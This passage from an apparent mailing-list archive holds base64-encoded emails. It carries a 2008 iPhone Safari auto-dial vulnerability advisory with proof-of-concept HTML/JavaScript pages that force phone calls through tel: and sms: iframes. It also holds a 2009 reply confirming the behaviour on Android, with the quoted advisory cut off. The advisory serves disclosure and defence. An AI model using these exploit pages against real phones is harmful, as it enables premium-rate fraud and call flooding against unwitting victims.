c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
aW9uIG9jY3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4+
PiAgIFNhZmFyaSBpcyBjbG9zZWQgYnkgbGF1bmNoaW5nIGFuIGV4dGVybmFsIGFwcGxpY2F0aW9u
LCBmb3IgZXhhbXBsZQ0KPj4+ICAgbGF1bmNoaW5nIHRoZSBTTVMgYXBwbGljYXRpb24gKGluIG9y
ZGVyIHRvIGhhbmRsZSBhIFNNUyBVUkkgWzJdKS4gVGhlDQo+Pj4gICBTTVMgYXBwbGljYXRpb24g
Y2FuIGJlIGxhdW5jaGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+Pj4gICBz
b3VyY2Ugb2YgYW4gaWZyYW1lLiBUaGlzIGlzIHNob3duIGluIHRoZSBmaXJzdCBwcm9vZi1vZi1j
b25jZXB0DQo+Pj4gICBleHBsb2l0IGJlbG93Lg0KPj4+IAkNCj4+PiAgIEZ1cnRoZXIgaW52ZXN0
aWdhdGlvbiBzaG93ZWQgdGhhdCB0aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+
Pj4gICBsYXVuY2hpbmcgb3RoZXIgYXBwbGljYXRpb25zIHN1Y2ggYXM6IE1hcHMsIFlvdVR1YmUs
IGFuZCBpVHVuZXMuDQo+Pj4gICBMYXVuY2hpbmcgdGhlc2UgYXBwbGljYXRpb25zIGNhbiBiZSBh
Y2hpZXZlZCB0aHJvdWdoIGxvYWRpbmcgc3BlY2lhbA0KPj4+ICAgVVJMcyB1c2luZyB0aGUgbWV0
YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93biBpbiB0aGUgc2Vjb25kDQo+Pj4gICBwcm9vZi1v
Zi1jb25jZXB0IGV4cGxvaXQgYmVsb3cuDQo+Pj4NCj4+PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0
aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVkIHRocm91Z2ggcG9wdXANCj4+PiAgIHdp
bmRvd3MgKGUuZy4gamF2YXNjcmlwdCBhbGVydCkuIEluIHRoaXMgc2l0dWF0aW9uIHRoZSBpbml0
aWF0aW5nIGFwcA0KPj4+ICAgZG9lcyBub3QgbmVlZCB0byBiZSB0ZXJtaWFudGVkIGluIG9yZGVy
IHRvIGFjdGl2ZSB0aGUgY2FsbC4NCj4+PiAJDQo+Pj4gICBGaW5hbGx5LCB3ZSBkaXNjb3ZlcmVk
IGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0NCj4+PiAgIG1hbGljaW91
cyBwaG9uZSBjYWxscyB0aGF0IGNhbm5vdCBiZSBwcmV2ZW50ZWQgb3IgY2FuY2VsZWQgYnkgdGhl
DQo+Pj4gICB2aWN0aW0uIFRoaXMgYnVnIGFsbG93cyB0aGUgYXR0YWNrZXIgdG8gZnJlZXogdGhl
IEdVSSAoZ3JhcGhpY2FsIHVzZXINCj4+PiAgIGludGVyZmFjZSkgZm9yIGEgbnVtYmVyIG9mIHNl
Y29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+Pj4gICBwcm9ncmVzc2Vz
IGluCXRoZSBiYWNrZ3JvdW5kIGFuZCBjYW5ub3QgYmUgc3RvcHBlZCBieSB0aGUgdmljdGltIHVz
ZXIuDQo+Pj4gICBGcmVlemluZyB0aGUgR1VJIGlzIGFjaGlldmVkIGJ5IHBhc3NpbmcgYSAidmVy
eSBsb25nIiBwaG9uZSBudW1iZXIgdG8NCj4+PiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRoZSBT
TVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+Pj4gICBzdGFydGVkLCBm
cmVlemVzIHRoZSBpUGhvbmUgR1VJLiBBbHNvIHN3aXRjaGluZyBvZmYgdGhlIGlQaG9uZSBjYW5u
b3QNCj4+PiAgIGJlIHBlcmZvcm1lZCBmYXN0IGVub3VnaCBpbiBvcmRlciB0byBwcmV2ZW50IHRo
ZSBtYWxpY2lvdXMgY2FsbC4NCj4+PiAJDQo+Pj4NCj4+PiAgIFsxXSBodHRwOi8vd3d3LnJmYy1l
ZGl0b3Iub3JnL3JmYy9yZmMzOTY2LnR4dA0KPj4+ICAgWzJdIGh0dHA6Ly90b29scy5pZXRmLm9y
Zy9odG1sL2RyYWZ0LWFudHRpLWdzbS1zbXMtdXJsLTA0DQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4gRnVydGhlciBEaXNjdXNzaW9uOg0KPj4+DQo+Pj4g
ICBUaGUgZGlhbGluZyBkaWFsb2cgaXMgY2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRo
ZSB1c2VyLCBpbiBtb3N0DQo+Pj4gICBjYXNlcywgY2FuJ3QgcHJlc3MgY2FuY2VsIHF1aWNrIGVu
b3VnaCBpbiBvcmRlciB0byBzdG9wIHRoZSBpbml0aWF0aW9uDQo+Pj4gICBvZiB0aGUgY2FsbC4g
T25jZSB0aGUgZXh0ZXJuYWwgYXBwbGljYXRpb24gaXMgbGF1bmNoZWQsIHRoZSB0ZWxlcGhvbnkN
Cj4+PiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcgaW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWlu
ZyB0aGUgY2FsbC4gT25seQ0KPj4+ICAgdGhlIGNhbGwgZm9yd2FyZGluZyBkaWFsb2cgKGNvbnRh
aW5pbmcgdGhlICJkaXNtaXNzIiBidXR0b24pIGluZGljYXRlcw0KPj4+ICAgYSBjYWxsIGJlaW5n
IG1hZGUuDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+DQo+Pj4g
UHJvb2Ytb2YtQ29uY2VwdCB3aXRoIHBsYWluIEhUTUwgdXNpbmcgdGhlIFNNUyBhcHBsaWNhdGlv
bjoNCj4+Pg0KPj4+ICAgPGh0bWw+DQo+Pj4gICA8aGVhZD4NCj4+PiAgIDx0aXRsZT5pUGhvbmUg
U2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29sbGluIE11bGxpbmVyDQo+
Pj4gICA8L3RpdGxlPg0KPj4+ICAgPC9oZWFkPg0KPj4+ICAgPGJvZHk+DQo+Pj4gICA8aWZyYW1l
IHNyYz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPj4+
ICAgPGlmcmFtZSBzcmM9InRlbDorMTQwODk3NDgzODgiIFdJRFRIPTUwIEhFSUdIVD0xMD48L2lm
cmFtZT4NCj4+PiAgIDwhLS0gc2Vjb25kIGlmcmFtZSBpcyB0byBhdHRhY2sgcXVpY2sgdXNlcnMg
d2hvIG1hbmFnZSB0byBjbG9zZSB0aGUNCj4+PiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8t
LT4NCj4+PiAgIDxpZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9
MTA+PC9pZnJhbWU+DQo+Pj4gICA8L2JvZHk+DQo+Pj4gICA8L2h0bWw+DQo+Pj4NCj4+PiBQcm9v
Zi1vZi1Db25jZXB0IHVzaW5nIGphdmFzY3JpcHQgYW5kIHRoZSBNYXBzIGFwcGxpY2F0aW9uOg0K
Pj4+DQo+Pj4gICA8aHRtbD4NCj4+PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZh
cmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAg
IDwvdGl0bGU+DQo+Pj4gICA8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwOw0K
Pj4+ICAgVVJMPWh0dHA6Ly9tYXBzLmdvb2dsZS5kZS9tYXBzP3E9cmhlaW5zdHJhc3NlKzc1K2Rh
cm1zdGFkdCI+DQo+Pj4gICA8L2hlYWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFu
Zz1qYXZhc2NyaXB0Pg0KPj4+ICAgZnVuY3Rpb24gYSgpIHsNCj4+PiAgICBkb2N1bWVudC53cml0
ZSgiPGlmcmFtZSBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgV0lEVEg9NTAgDQo+Pj4gSEVJR0hU
PTEwPjwvaWZyYW1lPiIpOw0KPj4+ICAgfQ0KPj4+ICAgc2V0VGltZW91dCgiYSgpIiwgMTAwKTsN
Cj4+PiAgIDwvc2NyaXB0Pg0KPj4+ICAgPC9ib2R5Pg0KPj4+ICAgPC9odG1sPg0KPj4+IAkNCj4+
PiBQcm9vZi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0
b3AgdGhlIG1hbGljaW91cyANCj4+PiBwaG9uZSBjYWxsOg0KPj4+DQo+Pj4gICA8aHRtbD4NCj4+
PiAgIDxoZWFkPg0KPj4+ICAgPHRpdGxlPmlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4
cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGluZXINCj4+PiAgIDwvdGl0bGU+DQo+Pj4gICA8L2hl
YWQ+DQo+Pj4gICA8Ym9keT4NCj4+PiAgIDxzY3JpcHQgbGFuZz1qYXZhc2NyaXB0Pg0KPj4+ICAg
bCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0KPj4+ICAgZm9yIChpID0gMDsgaSA8IDEwMDAwOyBp
KyspIHsNCj4+PiAgICAgICAgICAgbCA9IGwgKyAiMzM0MDk0ODAzNDI5ODIzMiI7DQo+Pj4gICB9
DQo+Pj4gICBsID0gbCArICJcIiB3aWR0aD0xMCBoZWlnaHQ9MTA+PC9pZnJhbWU+PGlmcmFtZQ0K
Pj4+ICAgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIGhlaWdodD0xMCB3aWR0aD0xMD48L2lmcmFt
ZT4iOw0KPj4+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+Pj4gICA8L3NjcmlwdD4NCj4+PiAgIDwv
Ym9keT4NCj4+PiAgIDwvaHRtbD4NCj4+Pg0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tDQo+Pj4NCj4+PiBNb3JlIERldGFpbGVkIEluZm9ybWF0aW9uOg0KPj4+DQo+Pj4gIERlbW8g
dmlkZW8gYXZhaWxhYmxlIGF0Og0KPj4+ICAgaHR0cDovL3d3dy5tdWxsaW5lci5vcmcvaXBob25l
Lw0KPj4+DQo+Pj4gIEFkdmlzb3JpZXM6DQo+Pj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9z
ZWN1cml0eS9hZHZpc29yaWVzLw0KPj4+DQo+Pj4gLS0tIEVORCBBRFZJU09SWSAtLS0NCj4+Pg0K
Pj4+DQo+Pj4gLS0gDQo+Pj4gQ29sbGluIFIuIE11bGxpbmVyIDxjb2xsaW5AYmV0YXZlcnNpb24u
bmV0Pg0KPj4+IGluZm8vcGdwOiBmaW5nZXIgY29sbGluQGJldGF2ZXJzaW9uLm5ldA0KPj4+IElm
IEJpbGwgR2F0ZXMgaGFkIGEgbmlja2VsIGZvciBldmVyeSB0aW1lIFdpbmRvd3MgY3Jhc2hlZC4u
LiBPaCB3YWl0LCBoZSANCj4+PiBkb2VzIQ0KPg0KPg0KPi0tIA0KPkNvbGxpbiBSLiBNdWxsaW5l
ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
